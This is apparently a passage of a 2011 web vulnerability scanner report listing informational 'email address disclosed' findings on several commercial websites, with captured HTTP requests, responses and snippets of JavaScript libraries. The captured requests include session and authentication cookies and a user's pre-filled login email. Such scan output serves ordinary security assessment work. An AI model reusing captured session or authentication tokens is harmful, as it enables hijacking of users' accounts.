(function(b,ib){var t="none",M="LoadedContent",c=false,v="resize.",o="y",q="auto",e=true,L="nofollow",m="x";func
...[SNIP]...

25.21. https://www.mcafeesecure.com/us/legalinfo.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mcafeesecure.com
Path:	/us/legalinfo.jsp

Issue detail

The following email address was disclosed in the response:

Compliance@mcafee.com

Request

Response

25.22. http://www.passporterboards.com/forums/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.passporterboards.com
Path:	/forums/

Issue detail

The following email address was disclosed in the response:

support@passporter.com

Request

Response

25.23. http://www.petsmart.com/js/LIB_core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/js/LIB_core.js

Issue detail

The following email address was disclosed in the response:

sam@conio.net

Request

GET /js/LIB_core.js HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Referer: http://www.petsmart.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1; __g_u=321577027175173_1_1_0_5_1305941958166_1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:39:18 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 08 Nov 2006 21:00:01 GMT
ETag: "53cb54-aa04-421c29a2f3640"
Accept-Ranges: bytes
Cache-Control: max-age=21600
Expires: Mon, 16 May 2011 07:39:18 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Content-Length: 43524
Connection: close
Content-Type: application/x-javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see
...[SNIP]...

25.24. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/assets/js/jquery/plugins/jquery.cookie.js

Issue detail

The following email address was disclosed in the response:

klaus.hartl@stilbuero.de

Request

GET /assets/js/jquery/plugins/jquery.cookie.js HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; TS1c138a=3df5ee0d2da226cbb8724d51bbf2990e2efa223a5124b4964dd084fd

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4246
Date: Mon, 16 May 2011 01:39:38 GMT
Connection: close
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 18:32:41 GMT

/**
* Cookie plugin
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the MIT and GPL licenses:
* http://www.opensource.org/licenses/mit-license.php
* http://www.gnu.org/li
...[SNIP]...
kie will be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...

25.25. http://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.restorationhardware.com
Path:	/assets/js/jquery/plugins/jquery.pngFix.js

Issue detail

The following email addresses were disclosed in the response:

andreas.eberhard@gmail.com
scott@filamentgroup.com

Request

GET /assets/js/jquery/plugins/jquery.pngFix.js HTTP/1.1
Host: www.restorationhardware.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; TS1c138a=3df5ee0d2da226cbb8724d51bbf2990e2efa223a5124b4964dd084fd

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 19:37:06 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 4795
Date: Mon, 16 May 2011 01:39:37 GMT
Connection: close
Cache-Control: max-age=3600
Expires: Sun, 15 May 2011 18:34:04 GMT

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.2, 09.03.2009
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
* Licensed under GPL (http://www.opensource.org/licenses/gpl-license.php)
*
* Changelog:

...[SNIP]...
from selectors
* 11.09.2007 Version 1.1
* - removed noConflict
* - added png-support for input type=image
* - 01.08.2007 CSS background-image support extension added by Scott Jehl, scott@filamentgroup.com, http://www.filamentgroup.com
* 31.05.2007 initial Version 1.0
* --------------------------------------------------------------------
* @example $(function(){$(document).pngFix();});
* @des
...[SNIP]...

25.26. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:53 GMT
Connection: close
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

25.27. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:52 GMT
Connection: close
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

25.28. http://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@5s.tc

Request

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT
Accept-Ranges: bytes
ntCoent-Length: 36836
Content-Type: application/x-javascript
Content-Length: 36836
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:19:52 GMT
Connection: close
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

25.29. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js

Issue detail

The following email address was disclosed in the response:

tdd@tddsworld.com

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/controls.js HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 34927
Content-Type: application/x-javascript
Content-Length: 34927
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:19 GMT
Connection: keep-alive
Cache-Control: private

// script.aculo.us controls.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Ivan Krstic (htt
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

25.30. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js

Issue detail

The following email address was disclosed in the response:

sammi@oriontransfer.co.nz

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/dragdrop.js HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551&eid=409204880
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 16 Jul 2009 16:06:33 GMT
Accept-Ranges: bytes
ntCoent-Length: 31605
Content-Type: application/x-javascript
Content-Length: 31605
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:19 GMT
Connection: keep-alive
Cache-Control: private

// script.aculo.us dragdrop.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005-2007 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// script.aculo.us is freely distributable under the terms of an MIT-style license.
// For details, see the script.aculo.us web site: http://script.aculo.us/

if(Object.isUndefined(Effect))
thr
...[SNIP]...

25.31. https://www.sonystyle.com/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js

Issue detail

The following email address was disclosed in the response:

id@5s.tc

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/javascript/s_code.js HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout?langId=-1&storeId=10151&catalogId=10551&krypto=%2BIw6iFkoFJ1hQSYq1rIctg%3D%3D&ddkey=http:SYOrderCheckout
Cookie: TS5bbf46=b8fba18f1f5a5e109b65064644b856f578ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay%25253FserviceId%25253D8198552921665820080%252526orderItemId%25253D123237101%252526installationId%25253D%252526langId%25253D-1%252526fromInterstitialPage%25253Dtrue%252526categoryId%25253D%252526quantity%25253D1%252526engraveTextLine2%25253D%252526orderId%25253D.%252526engraveTextLine1%25253D%252526mainItemOrdrIt%2526oid%253Dhttp%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/SYOrderCheckout%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526lan%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":4,"c":"http://www.sonystyle.com/webapp/wcs/stores/servlet/OrderItemDisplay","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 14 Dec 2010 00:04:21 GMT
Accept-Ranges: bytes
ntCoent-Length: 36836
Content-Type: application/x-javascript
Content-Length: 36836
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:22:00 GMT
Connection: keep-alive
Cache-Control: private

/* SiteCatalyst code version: H.19.4.
Copyright 1997-2009 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...
5trk`F$E)#N=#d($J,(vt#qt`cvt)`j+s.hav()+q+(qs?qs:s.rq(^A)),0#g);qs`n;`am('t')`5s.p_r)s.p_r(`U`d`n}^K(qs);^n`z(@w;`v@w`M^8,`H$b1',vb`U@Y=^V=`N`p=`N^W=`G`m''`5#Z)`G@9@Y=`G@9eo=`G@9^6`p="
+"`G@9^6^W`n`5!id@5s.tc@Ctc=1;s.flush`W()}`2#N`9tl`0o,t,n,vo`1;s.@Y=$Po);`N^W=t;`N`p=n;s.t(@w}`5pg){`G@9co`0o){`I@2\"_\",1,#v`2$Po)`9wd@9gs`0$M{`I@2#Q1,#v`2s.t()`9wd@9dc`0$M{`I@2#Q#v`2s.t()}}@Ll=(`G`"
+"Q`k`8`4$Ns$90`Ud=^E;
...[SNIP]...

25.32. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The following email addresses were disclosed in the response:

dhh@fastdial.net
sonystyle@custhelp.com

Request

GET /webapp/wcs/stores/servlet/LogonForm?langId=-1&catalogId=10551&storeId=10151&krypto=6TK0csA3VKaVj8zaOP%2BDyFjKp6tsiaLqf7riQWeo9WydazieU64wc7ydgkfiZ7mUK0b78aGFqBr1%0ADKRU6bI8jeCLS3A8yshnzOAH6vahXaKt4gcv2hui1foc9T1i7eGJpqTtI03Rap4Gq5OTStOYBuwh%0A%2F60hwpgREfsZjfLWDwbStEXpUc10johS3FGd%2F18A0Ey7H4tETSzOZM4YlIlDehi7NQE6rxlPofVE%0ADvc702QtqV0tNZnSbHJoWaqUPQQfaws7Eu2T3uQrhRo35z2kNlqFfx4w6Lz9GO8h5xI8XCIOfOuA%0Ashb%2B8Ct8SnAkZxnXCnEgqK9t76bOKuihxQXqFbzKk3Wf1EO5Cxjb40l1iD9BIvx1egXW%2BmQz00nz%0AF%2FaAaEQeOyk4XelMojnsci6aEuen2UHW%2F2kBWNeObDB2MncmbeI6qJWn91zUIhBkfzEG7LkIq%2Bd0%0AnH%2BpQSGhwC5HQlLGe5%2FS7nG0R6CbR4bhOCOdvEVlMl4kMtvUgtJu196wB%2FE2yuGBgJTRKcOMz8um%0ASLDaxlXmX6JgCLWqy8TH7lZKH0KVJfLmxKm%2FFn4dgUuiJdVzeekiJOjFmFhmjUyEfv56xjnnyopT%0A6cR64M1G00xgSVYmnxHiEn0aouTPx5DzD4NQhbzXH8PKwfCt26wVLWIRmoav2hQhPV%2Fy3sN47hFx%0Au9tozdk1VMvyYyHmNXgwvhkUszF0XkiuULIS1EBNMxhuvjeHicQVYww4de7OT4jtGL7ontVG5QiN%0AWZAh0dQCh6Nb5ofUAZ94dkx4sqCHHiyc7BQCU3Q48C47zdC0txmyTeFIOzFQSObR7PDG3ltv4BRf%0AaezELoQnCIVVgDNaSTbxVO2RE63eGBAoSp7DlMCOsJPYVYmDZanPz5SCu1YyikoRIN75XTttMMBF%0APKKTqwkwFaptG8c7g%2BT3Pi46MdyEpEI5blAGGM%2F6WgBL6so5cpdtwzMKbNl5M%2Bu2wVk%2BUw%3D%3D&ddkey=http:SYOrderCheckout HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView
Cookie: TS5bbf46=6e127c2b6ef7ec887395f5889b15345a78ed098d530cefc94dd044a960ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=%5B%5BB%5D%5D; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":6,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm","lc":{"d0":{"v":6,"s":true,"e":3}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 88478
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 88478
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:25:02 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.e
...[SNIP]...
axElement("showSuccess");
ajaxEngine.sendRequest('SYForgotPasswordAjax', {method:'post', parameters: 'genericeForgotPasswordPage=yes&logonId='+ emailId});
}
function readCookie()
{
var errorLogonId='dhh@fastdial.net';
var link= 'Logoff?catalogId=10551&langId=-1&storeId=10151&URL=UserRegistrationForm&remember=0';
var remember = (getUserCookieValue('REMEMBER') == null)?'0':getUserCookieValue('REMEMBER');
var logonI
...[SNIP]...
<input type="text" maxlength="254" value="dhh@fastdial.net"
name="loginLogonId" id="loginLogonId" class="text validate-email-custom validation-failed" />
...[SNIP]...
<a href="mailto:sonystyle@custhelp.com">sonystyle@custhelp.com</a>
...[SNIP]...

25.33. http://www.telegraph.co.uk/template/ver1-0/js/jquery.tablesorter.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.telegraph.co.uk
Path:	/template/ver1-0/js/jquery.tablesorter.js

Issue detail

The following email address was disclosed in the response:

christian.bach@polyester.se

Request

GET /template/ver1-0/js/jquery.tablesorter.js HTTP/1.1
Host: www.telegraph.co.uk
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1374949008.30151527:lv=1305526776991:ss=1305526776991; __utmz=76009744.1305508777.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=76009744.1214434362.1305508777.1305508777.1305508777.1; __utmc=76009744; __utmb=76009744.1.10.1305508777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 10 May 2011 14:02:05 GMT
ETag: "6b194c-5d65-4a2ec66a658bf"
Accept-Ranges: bytes
Content-Type: application/javascript
Content-Length: 23909
Date: Mon, 16 May 2011 01:19:38 GMT
Connection: close
Vary: Accept-Encoding

/*
*
* TableSorter 2.0 - Client-side table sorting with ease!
* Version 2.0.3
* @requires jQuery v1.2.3
*
* Copyright (c) 2007 Christian Bach
* Examples and docs at: http://tablesorter.com
*
...[SNIP]...
ean flag indicating if tablesorter should display debuging information usefull for development.
*
* @type jQuery
*
* @name tablesorter
*
* @cat Plugins/Tablesorter
*
* @author Christian Bach/christian.bach@polyester.se
*/

(function($) {
   $.extend({
       tablesorter: new function() {

           var parsers = [], widgets = [];

           this.defaults = {
               cssHeader: "header",
               cssAsc: "headerSortUp",
               cssDesc: "heade
...[SNIP]...

25.34. http://www.travelguard.com/WorkArea/java/ektron.js previous next

Summary

